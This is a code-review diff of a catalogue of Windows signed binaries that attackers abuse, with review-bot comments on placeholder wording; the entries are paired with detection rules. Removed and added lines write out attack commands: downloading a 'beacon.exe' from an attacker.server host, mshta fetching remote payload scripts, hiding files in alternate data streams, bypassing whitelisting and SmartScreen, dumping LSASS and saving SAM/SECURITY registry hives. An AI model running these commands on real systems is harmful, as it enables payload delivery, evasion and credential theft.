Usecase: Compile and run code
Category: Execute
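Review bot: the Description under this changed Command still says `referenced in the test.txt file`, although the first argument is now `{PATH}`; reword it as for the first command (`referenced in the first argument`). The identical Description in the next hunk (the AWL Bypass entry) needs the same change.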
@ -23,7 +23,7 @@ Commands:
OperatingSystem: Windows 10S, Windows 11
Tags:
- Execute: XOML
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
- Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
Usecase: Compile and run code
Category: AWL Bypass
@ -34,8 +34,6 @@ Commands:
- Execute: XOML
Full_Path:
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml
- Splunk: https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml

View File

@ -4,7 +4,7 @@ Description: Load snap-ins to locally and remotely manage Windows systems
Author: '@bohops'
Created: 2018-12-04
Commands:
- Command: mmc.exe -Embedding c:\path\to\test.msc
- Command: mmc.exe -Embedding {PATH_ABSOLUTE:.msc}
Description: Launch a 'backgrounded' MMC process and invoke a COM payload
Usecase: Configure a snap-in to load a COM custom class (CLSID) that has been added to the registry
Category: Execute
@ -25,8 +25,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\mmc.exe
- Path: C:\Windows\SysWOW64\mmc.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml

View File

@ -1,26 +1,26 @@
---
Name: MpCmdRun.exe
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2020-03-20
Commands:
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
- Command: MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
Usecase: Download file
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10
- Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe
- Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url {REMOTEURL:.exe} -path C:\Users\Public\Downloads\evil.exe
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]
Usecase: Download file
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\temp\nicefile.txt:evil.exe
- Command: MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}:evil.exe
Description: Download file to machine and store it in Alternate Data Stream
Usecase: Hide downloaded data inton an Alternate Data Stream
Usecase: Hide downloaded data into an Alternate Data Stream
Category: ADS
Privileges: User
MitreID: T1564.004
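Review bot: two placeholder issues in this hunk. In the second command only the URL was replaced while `-path C:\Users\Public\Downloads\evil.exe` stays literal; `{PATH_ABSOLUTE:.exe}` would be consistent with the first command. In the third command `-path {PATH_ABSOLUTE:.exe}:evil.exe` gives the ADS host file an `.exe` hint, but the original host was `nicefile.txt` and the entry's Usecase is about hiding data in a stream of an ordinary file; use `{PATH_ABSOLUTE}:evil.exe`, as the other ADS entries in this commit do.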
@ -32,8 +32,6 @@ Full_Path:
- Path: C:\Program Files\Windows Defender\MpCmdRun.exe
- Path: C:\Program Files (x86)\Windows Defender\MpCmdRun.exe
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23110.3-0\X86\MpCmdRun.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml
- Elastic: https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml
@ -53,6 +51,5 @@ Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
- Person: RichRumble
Handle: ''
- Person: Cedric
Handle: '@th3c3dr1c'

View File

@ -1,10 +1,10 @@
---
Name: Msbuild.exe
Description: Used to compile and execute code
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: msbuild.exe pshell.xml
- Command: msbuild.exe {PATH:.xml}
Description: Build and execute a C# project stored in the target XML file.
Usecase: Compile and run code
Category: AWL Bypass
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CSharp
- Command: msbuild.exe project.csproj
- Command: msbuild.exe {PATH:.csproj}
Description: Build and execute a C# project stored in the target csproj file.
Usecase: Compile and run code
Category: Execute
@ -22,8 +22,8 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: CSharp
- Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo
Description: Executes generated Logger DLL file with TargetLogger export
- Command: msbuild.exe /logger:TargetLogger,{PATH_ABSOLUTE:.dll};MyParameters,Foo
Description: Executes generated Logger DLL file with TargetLogger export.
Usecase: Execute DLL
Category: Execute
Privileges: User
@ -31,8 +31,8 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: msbuild.exe project.proj
Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
- Command: msbuild.exe {PATH:.proj}
Description: Execute JScript/VBScript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
Usecase: Execute project file that contains XslTransformation tag parameters
Category: Execute
Privileges: User
@ -40,7 +40,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: XSL
- Command: msbuild.exe @sample.rsp
- Command: msbuild.exe @{PATH:.rsp}
Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
Usecase: Bypass command-line based detections
Category: Execute
@ -57,8 +57,6 @@ Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
- Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml

View File

@ -1,7 +1,7 @@
---
Name: Msconfig.exe
Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Msconfig.exe -5

View File

@ -1,11 +1,11 @@
---
Name: Msdt.exe
Description: Microsoft diagnostics tool
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the .xml file.
Usecase: Execute code
Category: Execute
Privileges: User
@ -14,8 +14,8 @@ Commands:
Tags:
- Application: GUI
- Execute: MSI
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the .xml file.
Usecase: Execute code bypass Application whitelisting
Category: AWL Bypass
Privileges: User

View File

@ -4,22 +4,22 @@ Description: Microsoft Edge browser
Author: mr.d0x
Created: 2022-01-20
Commands:
- Command: msedge.exe https://example.com/file.exe.txt
Description: Edge will launch and download the file. A harmless file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen.
- Command: msedge.exe {REMOTEURL:.exe.txt}
Description: Edge will launch and download the file. A 'harmless' file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen.
Usecase: Download file from the internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
- Command: msedge.exe --headless --enable-logging --disable-gpu --dump-dom "http://example.com/evil.b64.html" > out.b64
- Command: msedge.exe --headless --enable-logging --disable-gpu --dump-dom "{REMOTEURL:.base64.html}" > {PATH:.b64}
Description: Edge will silently download the file. File extension should be .html and binaries should be encoded.
Usecase: Download file from the internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
- Command: msedge.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&"
Description: Edge spawns cmd.exe as a child process of msedge.exe and executes the ping command
- Command: msedge.exe --disable-gpu-sandbox --gpu-launcher="{CMD} &&"
Description: Edge spawns cmd.exe as a child process of msedge.exe and executes the specified command
Usecase: Executes a process under a trusted Microsoft signed binary
Category: Execute
Privileges: User
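Review bot: the description on the `--gpu-launcher` entry still says Edge spawns `cmd.exe` as the child process, but the command now reads `--gpu-launcher="{CMD} &&"`, so the child is whatever `{CMD}` expands to rather than `cmd.exe`; either keep the `cmd.exe /c` prefix in the template or reword the description to "spawns the specified command as a child process of msedge.exe" so the text and the placeholder agree.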

View File

@ -4,7 +4,7 @@ Description: Used by Windows to execute html applications. (.hta)
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: mshta.exe evilfile.hta
- Command: mshta.exe {PATH:.hta}
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
Usecase: Execute code
Category: Execute
@ -14,7 +14,7 @@ Commands:
Tags:
- Execute: HTA
- Execute: Remote
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:{REMOTEURL:.sct}"")"))
Description: Executes VBScript supplied as a command line argument.
Usecase: Execute code
Category: Execute
@ -23,7 +23,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: VBScript
- Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close();
- Command: mshta.exe javascript:a=GetObject("script:{REMOTEURL:.sct}").Exec();close();
Description: Executes JavaScript supplied as a command line argument.
Usecase: Execute code
Category: Execute
@ -32,7 +32,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: JScript
- Command: mshta.exe "C:\ads\file.txt:file.hta"
- Command: mshta.exe "{PATH_ABSOLUTE}:file.hta"
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
Usecase: Execute code hidden in alternate data stream
Category: ADS
@ -41,7 +41,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
Tags:
- Execute: HTA
- Command: mshta.exe https://example.com/payload
- Command: mshta.exe {REMOTEURL}
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server
Category: Download

View File

@ -1,10 +1,10 @@
---
Name: Msiexec.exe
Description: Used by Windows to execute msi files
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: msiexec /quiet /i cmd.msi
- Command: msiexec /quiet /i {PATH:.msi}
Description: Installs the target .MSI file silently.
Usecase: Execute custom made msi file with attack code
Category: Execute
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: MSI
- Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
- Command: msiexec /q /i {REMOTEURL}
Description: Installs the target remote & renamed .MSI file silently.
Usecase: Execute custom made msi file with attack code from remote server
Category: Execute
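Review bot: `{REMOTEURL}` drops the extension hint that the original `cmd.png` URL carried, yet the description on the next line still says "remote & renamed .MSI file"; use an extension-qualified placeholder such as `{REMOTEURL:.png}` so the rendered command still shows the renaming the description refers to.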
@ -23,7 +23,7 @@ Commands:
Tags:
- Execute: MSI
- Execute: Remote
- Command: msiexec /y "C:\folder\evil.dll"
- Command: msiexec /y {PATH_ABSOLUTE:.dll}
Description: Calls DllRegisterServer to register the target DLL.
Usecase: Execute dll files
Category: Execute
@ -33,7 +33,7 @@ Commands:
Tags:
- Execute: DLL
- Execute: Remote
- Command: msiexec /z "C:\folder\evil.dll"
- Command: msiexec /z {PATH_ABSOLUTE:.dll}
Description: Calls DllUnregisterServer to un-register the target DLL.
Usecase: Execute dll files
Category: Execute
@ -43,7 +43,7 @@ Commands:
Tags:
- Execute: DLL
- Execute: Remote
- Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
- Command: msiexec /i {PATH_ABSOLUTE:.msi} TRANSFORMS="{REMOTEURL:.mst}" /qb
Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.
Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server
Category: Execute
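Review bot: the first argument was changed from the remote `https://trustedURL/signed.msi` to `{PATH_ABSOLUTE:.msi}`, but the description still says "Installs the target .MSI file from a remote URL" and the Usecase says "from a remote server"; use `{REMOTEURL:.msi}` to match the text, or update both sentences if a local path is intended. Unrelated to this change, "which can contains malicious code" in the same description should read "which can contain".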

View File

@ -1,10 +1,10 @@
---
Name: Netsh.exe
Description: Netsh is a Windows tool used to manipulate network interface settings.
Author: 'Freddie Barr-Smith'
Author: Freddie Barr-Smith
Created: 2019-12-24
Commands:
- Command: netsh.exe add helper C:\Users\User\file.dll
- Command: netsh.exe add helper {PATH_ABSOLUTE:.dll}
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
Usecase: Proxy execution of .dll
Category: Execute

View File

@ -4,7 +4,7 @@ Description: Microsoft Native Image Generator.
Author: Avihay Eldad
Created: 2024-02-19
Commands:
- Command: ngen.exe http://example.com/calc.exe
- Command: ngen.exe {REMOTEURL}
Description: Downloads payload from remote server using the Microsoft Native Image Generator utility.
Usecase: It will download a remote payload and place it in INetCache.
Category: Download

View File

@ -1,12 +1,12 @@
---
Name: Odbcconf.exe
Description: Used in Windows for managing ODBC connections
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: odbcconf /a {REGSVR c:\test\test.dll}
Description: Execute DllREgisterServer from DLL specified.
Usecase: Execute dll file using technique that can evade defensive counter measures
- Command: odbcconf /a {REGSVR {PATH_ABSOLUTE:.dll}}
Description: Execute DllRegisterServer from DLL specified.
Usecase: Execute a DLL file using technique that can evade defensive counter measures
Category: Execute
Privileges: User
MitreID: T1218.008
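Review bot: `odbcconf /a {REGSVR {PATH_ABSOLUTE:.dll}}` nests the placeholder inside odbcconf's own brace syntax; check that the site's placeholder substitution handles a `{...}` token inside `{REGSVR ...}` without consuming the outer brace pair, since the `REGSVR` braces are literal command syntax that must survive rendering. The same concern does not apply to the `INSTALLDRIVER` entry in the next hunk, where the placeholder sits inside a quoted string.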
@ -14,7 +14,7 @@ Commands:
Tags:
- Execute: DLL
- Command: |
odbcconf INSTALLDRIVER "lolbas-project|Driver=c:\test\test.dll|APILevel=2"
odbcconf INSTALLDRIVER "lolbas-project|Driver={PATH_ABSOLUTE:.dll}|APILevel=2"
odbcconf configsysdsn "lolbas-project" "DSN=lolbas-project"
Description: Install a driver and load the DLL. Requires administrator privileges.
Usecase: Execute dll file using technique that can evade defensive counter measures
@ -24,7 +24,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: odbcconf -f file.rsp
- Command: odbcconf -f {PATH:.rsp}
Description: Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file.
Usecase: Execute dll file using technique that can evade defensive counter measures
Category: Execute

View File

@ -1,10 +1,10 @@
---
Name: Pcalua.exe
Description: Program Compatibility Assistant
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: pcalua.exe -a calc.exe
- Command: pcalua.exe -a {PATH:.exe}
Description: Open the target .EXE using the Program Compatibility Assistant.
Usecase: Proxy execution of binary
Category: Execute
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: EXE
- Command: pcalua.exe -a \\server\payload.dll
- Command: pcalua.exe -a {PATH_SMB:.dll}
Description: Open the target .DLL file with the Program Compatibilty Assistant.
Usecase: Proxy execution of remote dll file
Category: Execute
@ -23,7 +23,7 @@ Commands:
Tags:
- Execute: DLL
- Execute: Remote
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
- Command: pcalua.exe -a {PATH_ABSOLUTE:.cpl} -c Java
Description: Open the target .CPL file with the Program Compatibility Assistant.
Usecase: Execution of CPL files
Category: Execute
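Review bot: `-c Java` in `pcalua.exe -a {PATH_ABSOLUTE:.cpl} -c Java` is an argument tied to the Java control panel applet that the original `javacpl.cpl` example used; with a generic `.cpl` placeholder it no longer makes sense. Either drop `-c Java` from the template or keep `javacpl.cpl` as the concrete example and say so in the description.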

View File

@ -1,10 +1,10 @@
---
Name: Pcwrun.exe
Description: Program Compatibility Wizard
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Pcwrun.exe c:\temp\beacon.exe
- Command: Pcwrun.exe {PATH_ABSOLUTE:.exe}
Description: Open the target .EXE file with the Program Compatibility Wizard.
Usecase: Proxy execution of binary
Category: Execute

View File

@ -1,7 +1,7 @@
---
Name: Pktmon.exe
Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
Author: 'Derek Johnson'
Author: Derek Johnson
Created: 2020-08-12
Commands:
- Command: pktmon.exe start --etw
@ -21,8 +21,6 @@ Commands:
Full_Path:
- Path: c:\windows\system32\pktmon.exe
- Path: c:\windows\syswow64\pktmon.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml
- IOC: .etl files found on system
@ -30,4 +28,3 @@ Resources:
- Link: https://binar-x79.com/windows-10-secret-sniffer/
Acknowledgement:
- Person: Derek Johnson
Handle: ''

View File

@ -4,7 +4,7 @@ Description: Used for installing drivers
Author: Hai vaknin (lux)
Created: 2020-12-25
Commands:
- Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf
- Command: pnputil.exe -i -a {PATH_ABSOLUTE:.inf}
Description: Used for installing drivers
Usecase: Add malicious driver
Category: Execute

View File

@ -4,16 +4,16 @@ Description: File is used for executing Browser applications
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: Presentationhost.exe C:\temp\Evil.xbap
- Command: Presentationhost.exe {PATH_ABSOLUTE:.xbap}
Description: Executes the target XAML Browser Application (XBAP) file
Usecase: Execute code within xbap files
Usecase: Execute code within XBAP files
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: XBAP
- Command: Presentationhost.exe https://example.com/payload
- Command: Presentationhost.exe {REMOTEURL}
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server
Category: Download

View File

@ -1,24 +1,24 @@
---
Name: Print.exe
Description: Used by Windows to send files to the printer
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
- Command: print /D:{PATH_ABSOLUTE}:file.exe {PATH_ABSOLUTE:.exe}
Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe
- Command: print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_ABSOLUTE:.source.exe}
Description: Copy file from source to destination
Usecase: Copy files
Category: Copy
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
- Command: print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_SMB:.source.exe}
Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
Usecase: Copy/Download file from remote server
Category: Copy
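Review bot: two descriptions in this hunk still refer to the literal names the placeholders replaced: the first says "Copy file.exe into the Alternate Data Stream (ADS) of file.txt" although the host file is now `{PATH_ABSOLUTE}`, and the third says "to the target c:\OutFolder\outfile.exe" although the destination is now `{PATH_ABSOLUTE:.dest.exe}`; reword both in the generic form already used for the second entry ("Copy file from source to destination").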
@ -28,8 +28,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\print.exe
- Path: C:\Windows\SysWOW64\print.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml
- IOC: Print.exe retrieving files from internet

View File

@ -1,10 +1,10 @@
---
Name: PrintBrm.exe
Description: Printer Migration Command-Line Tool
Author: 'Elliot Killick'
Author: Elliot Killick
Created: 2021-06-21
Commands:
- Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip
- Command: PrintBrm -b -d {PATH_SMB:folder} -f {PATH_ABSOLUTE:.zip}
Description: Create a ZIP file from a folder in a remote drive
Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file
Category: Download
@ -13,7 +13,7 @@ Commands:
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
- Command: PrintBrm -r -f {PATH_ABSOLUTE}:hidden.zip -d {PATH_ABSOLUTE:folder}
Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
Category: ADS

View File

@ -5,7 +5,7 @@ Author: Grzegorz Tworek
Created: 2023-06-30
Commands:
- Command: provlaunch.exe LOLBin
Description: 'Executes command defined in the Registry. Requires 3 levels of the key structure containing some keywords. Such keys may be created with two reg.exe commands, e.g. "reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0" and "reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe". Registry keys are deleted after successful execution.'
Description: 'Executes command defined in the Registry. Requires 3 levels of the key structure containing some keywords. Such keys may be created with two reg.exe commands, e.g. `reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0` and `reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe`. Registry keys are deleted after successful execution.'
Usecase: Executes arbitrary command
Category: Execute
Privileges: Administrator

View File

@ -4,7 +4,7 @@ Description: Windows Problem Steps Recorder, used to record screen and clicks.
Author: Leon Rodenko
Created: 2020-06-27
Commands:
- Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
- Command: psr.exe /start /output {PATH_ABSOLUTE:.zip} /sc 1 /gui 0
Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
Usecase: Can be used to take screenshots of the user environment
Category: Reconnaissance
@ -14,8 +14,6 @@ Commands:
Full_Path:
- Path: c:\windows\system32\psr.exe
- Path: c:\windows\syswow64\psr.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml
- IOC: psr.exe spawned

View File

@ -1,10 +1,10 @@
---
Name: Rasautou.exe
Description: Windows Remote Access Dialer
Author: 'Tony Lambert'
Author: Tony Lambert
Created: 2020-01-10
Commands:
- Command: rasautou -d powershell.dll -p powershell -a a -e e
- Command: rasautou -d {PATH:.dll} -p export_name -a a -e e
Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
Usecase: Execute DLL code
Category: Execute
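Review bot: `export_name` in `rasautou -d {PATH:.dll} -p export_name -a a -e e` is a free-text stand-in rather than a braced placeholder like `{PATH:.dll}`, so a reader may take it for a literal argument; either use a braced placeholder for it or state in the description that `-p` takes the name of the DLL export to call.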

View File

@ -4,21 +4,21 @@ Description: Microsoft Windows resource leak diagnostic tool
Author: 'John Dwyer'
Created: 2022-05-18
Commands:
- Command: rdrleakdiag.exe /p 940 /o c:\evil /fullmemdmp /wait 1
- Command: rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1
Description: Dump process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
Usecase: Dump process by PID.
Category: Dump
Privileges: User
MitreID: T1003
OperatingSystem: Windows
- Command: rdrleakdiag.exe /p 832 /o c:\evil /fullmemdmp /wait 1
- Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1
Description: Dump LSASS process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
Usecase: Dump LSASS process.
Category: Dump
Privileges: Administrator
MitreID: T1003.001
OperatingSystem: Windows
- Command: rdrleakdiag.exe /p 832 /o c:\evil /fullmemdmp /snap
- Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap
Description: After dumping a process using /wait 1, subsequent dumps must use /snap (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
Usecase: Dump LSASS process mutliple times.
Category: Dump
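Review bot: the unchanged context line "Dump LSASS process mutliple times." carries a typo ("mutliple"); since this hunk already touches the neighbouring command line, fix it to "multiple" here rather than in a follow-up.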
@ -28,8 +28,6 @@ Commands:
Full_Path:
- Path: c:\windows\system32\rdrleakdiag.exe
- Path: c:\Windows\SysWOW64\rdrleakdiag.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml
- Elastic: https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html

View File

@ -1,17 +1,17 @@
---
Name: Reg.exe
Description: Used to manipulate the registry
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
- Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg {PATH_ABSOLUTE}:evilreg.reg
Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream.
Usecase: Hide/plant registry information in Alternate data stream for later use
Category: ADS
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- Command: reg save HKLM\SECURITY c:\test\security.bak && reg save HKLM\SYSTEM c:\test\system.bak && reg save HKLM\SAM c:\test\sam.bak
